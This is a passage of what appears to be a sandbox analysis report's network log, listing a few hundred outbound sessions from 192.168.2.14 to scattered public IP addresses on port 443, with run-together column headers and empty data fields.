                                      14975192.168.2.145200469.239.238.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14976192.168.2.145695887.193.157.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14977192.168.2.1456454104.57.86.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14978192.168.2.144523035.251.168.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14979192.168.2.144219270.184.178.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14980192.168.2.144176827.121.130.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14981192.168.2.144087279.218.82.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14982192.168.2.145352420.91.6.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14983192.168.2.145354082.251.95.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14984192.168.2.145728444.41.250.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14985192.168.2.1439690131.57.242.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14986192.168.2.143372468.119.137.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14987192.168.2.1456944128.195.13.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14988192.168.2.144913857.168.27.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14989192.168.2.145503261.68.78.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14990192.168.2.1459364181.105.233.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14991192.168.2.1443934114.80.81.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14992192.168.2.1446034126.148.63.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14993192.168.2.1439432137.253.10.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14994192.168.2.1433952134.79.183.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14995192.168.2.145324823.6.7.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14996192.168.2.1451270130.218.167.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14997192.168.2.1458236184.240.94.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14998192.168.2.1447756112.8.96.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14999192.168.2.1460534143.219.211.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15000192.168.2.1438122152.82.176.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15001192.168.2.145474481.149.197.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15002192.168.2.1433032189.248.213.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15003192.168.2.144775687.244.47.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15004192.168.2.145180866.144.134.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15005192.168.2.1445268125.78.231.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15006192.168.2.1445218118.230.219.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15007192.168.2.144286861.55.37.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15008192.168.2.144800825.224.124.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15009192.168.2.1456752193.48.5.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15010192.168.2.143489290.154.173.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15011192.168.2.1460862213.233.214.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15012192.168.2.1444082213.194.91.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15013192.168.2.1444738110.95.72.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15014192.168.2.145073293.4.169.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15015192.168.2.143972695.152.200.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15016192.168.2.143563282.26.88.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15017192.168.2.1455650192.56.244.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15018192.168.2.1458768137.205.75.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15019192.168.2.1443868218.184.88.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15020192.168.2.1442794129.21.63.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15021192.168.2.1437220139.23.130.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15022192.168.2.143741212.242.110.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15023192.168.2.1435876177.251.161.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15024192.168.2.1455834203.7.26.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15025192.168.2.1440752108.85.242.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15026192.168.2.1446458202.84.195.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15027192.168.2.1434610171.220.132.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15028192.168.2.1454692112.174.236.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15029192.168.2.1440480219.61.119.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15030192.168.2.145464819.77.181.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15031192.168.2.14494641.158.209.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15032192.168.2.143728069.247.57.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15033192.168.2.1433154160.58.101.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15034192.168.2.1453028187.222.170.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15035192.168.2.1434598220.73.180.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15036192.168.2.1440130192.164.164.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15037192.168.2.145270048.203.43.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15038192.168.2.1449088130.154.78.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15039192.168.2.1445882176.65.229.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15040192.168.2.1453966106.145.47.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15041192.168.2.1434122195.152.124.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15042192.168.2.1460820212.210.135.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15043192.168.2.144937066.143.165.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15044192.168.2.144243038.28.197.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15045192.168.2.1453724188.175.212.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15046192.168.2.1447654202.200.45.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15047192.168.2.1455402201.95.40.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15048192.168.2.145663492.213.253.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15049192.168.2.1454186189.37.8.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15050192.168.2.145483840.23.77.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15051192.168.2.146010266.231.44.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15052192.168.2.144189436.192.124.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15053192.168.2.144871065.81.89.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15054192.168.2.145910039.15.180.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15055192.168.2.1442722103.236.85.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15056192.168.2.1446774217.19.119.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15057192.168.2.144401097.33.192.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15058192.168.2.1452914207.62.52.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15059192.168.2.1455814154.232.226.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15060192.168.2.143530488.225.96.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15061192.168.2.1450040156.198.125.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15062192.168.2.1450834181.35.169.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15063192.168.2.143565413.58.183.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15064192.168.2.1450708111.106.77.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15065192.168.2.1458376141.83.175.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15066192.168.2.145009273.12.178.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15067192.168.2.1447564121.11.149.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15068192.168.2.143645464.82.134.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15069192.168.2.1439408136.146.213.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15070192.168.2.1452990102.61.153.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15071192.168.2.1443488212.238.125.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15072192.168.2.1454940167.64.244.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15073192.168.2.1443272129.110.23.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15074192.168.2.1438460190.28.60.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15075192.168.2.145275075.222.211.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15076192.168.2.143466213.208.222.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15077192.168.2.14371025.142.175.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15078192.168.2.1445932192.183.125.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15079192.168.2.1435816181.68.225.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15080192.168.2.1437074185.56.38.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15081192.168.2.1447108170.121.131.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15082192.168.2.1434470157.223.99.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15083192.168.2.144335054.145.188.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15084192.168.2.1446114128.30.216.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15085192.168.2.143619252.67.31.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15086192.168.2.1455824200.193.68.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15087192.168.2.1444472101.148.38.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15088192.168.2.144075450.38.197.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15089192.168.2.1433052194.8.58.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15090192.168.2.1459100122.123.79.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15091192.168.2.145333499.165.186.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15092192.168.2.1456308145.19.126.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15093192.168.2.1459236144.251.88.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15094192.168.2.1451436156.220.226.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15095192.168.2.1458212167.177.71.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15096192.168.2.1459202133.171.158.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15097192.168.2.1434032131.54.107.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15098192.168.2.145734432.134.142.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15099192.168.2.1445560174.175.203.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15100192.168.2.144212281.167.63.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15101192.168.2.145174644.22.23.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15102192.168.2.1450946142.113.123.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15103192.168.2.1456186201.110.131.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15104192.168.2.1439098150.63.212.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15105192.168.2.144311449.136.200.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15106192.168.2.1445910157.190.38.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15107192.168.2.1460652174.250.181.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15108192.168.2.143998035.150.209.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15109192.168.2.146058068.41.105.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15110192.168.2.145758870.77.231.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15111192.168.2.14534805.152.212.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15112192.168.2.143465276.61.181.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15113192.168.2.143382865.32.69.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15114192.168.2.1446482219.40.59.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15115192.168.2.1450636184.54.109.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15116192.168.2.1459078187.219.15.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15117192.168.2.144512863.218.11.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15118192.168.2.143795846.245.48.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15119192.168.2.14512341.23.180.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15120192.168.2.1450576197.206.118.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15121192.168.2.1441122111.174.122.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15122192.168.2.1459630109.1.130.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15123192.168.2.1452678207.20.29.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15124192.168.2.1438516103.100.211.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15125192.168.2.144063299.36.145.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15126192.168.2.145250434.56.43.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15127192.168.2.1434410150.177.121.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15128192.168.2.1447128124.72.128.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15129192.168.2.1441692108.163.182.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15130192.168.2.144293870.45.176.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15131192.168.2.1434474166.168.130.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15132192.168.2.1452238194.35.87.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15133192.168.2.145168242.103.96.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15134192.168.2.144768840.207.136.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15135192.168.2.145283673.174.191.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15136192.168.2.1434114137.139.69.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15137192.168.2.144372879.227.103.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15138192.168.2.143937638.139.55.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15139192.168.2.1439636114.9.78.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15140192.168.2.1434146199.192.203.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15141192.168.2.14495064.64.173.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15142192.168.2.1455134162.138.223.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15143192.168.2.145581046.206.127.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15144192.168.2.1459830143.27.18.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15145192.168.2.1445604158.246.97.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15146192.168.2.143401262.156.95.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15147192.168.2.1438140105.212.244.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15148192.168.2.143367437.131.8.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15149192.168.2.143626239.198.178.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15150192.168.2.1439618176.87.209.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15151192.168.2.143309299.168.245.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15152192.168.2.144831682.94.153.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15153192.168.2.1437998154.216.87.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15154192.168.2.145811635.245.68.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15155192.168.2.144164018.181.18.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15156192.168.2.143690451.36.155.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15157192.168.2.1444918126.100.194.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15158192.168.2.1459776186.212.187.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15159192.168.2.1454356157.197.236.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15160192.168.2.146009435.195.136.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15161192.168.2.1452518193.94.79.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15162192.168.2.1449660118.242.116.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15163192.168.2.1433892101.196.157.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15164192.168.2.14380285.155.209.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15165192.168.2.1433016119.87.164.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15166192.168.2.144778465.179.168.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15167192.168.2.1439976186.71.174.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15168192.168.2.145278265.36.126.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15169192.168.2.1445986123.158.74.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15170192.168.2.145733284.117.177.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15171192.168.2.144614024.229.239.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15172192.168.2.1440486177.1.76.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15173192.168.2.1446142192.108.147.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15174192.168.2.14458428.114.124.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15175192.168.2.143926814.117.204.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15176192.168.2.144220827.109.173.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15177192.168.2.1452716193.61.232.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15178192.168.2.1442480193.148.199.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15179192.168.2.146029427.6.35.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15180192.168.2.1446898131.95.81.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15181192.168.2.1452356187.66.46.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15182192.168.2.1438366109.121.234.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15183192.168.2.145620877.75.104.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15184192.168.2.1455848146.120.163.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15185192.168.2.145147099.80.167.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15186192.168.2.1441718191.9.57.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15187192.168.2.1438944109.86.116.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15188192.168.2.145211492.189.78.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15189192.168.2.1450900155.180.139.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15190192.168.2.1444238155.150.237.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15191192.168.2.144435258.52.215.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192192.168.2.1440202100.18.4.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15193192.168.2.1440828121.185.40.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15194192.168.2.1459164173.201.113.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15195192.168.2.143991865.238.152.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15196192.168.2.1438884181.156.19.67443
                                      TimestampBytes transferredDirectionData


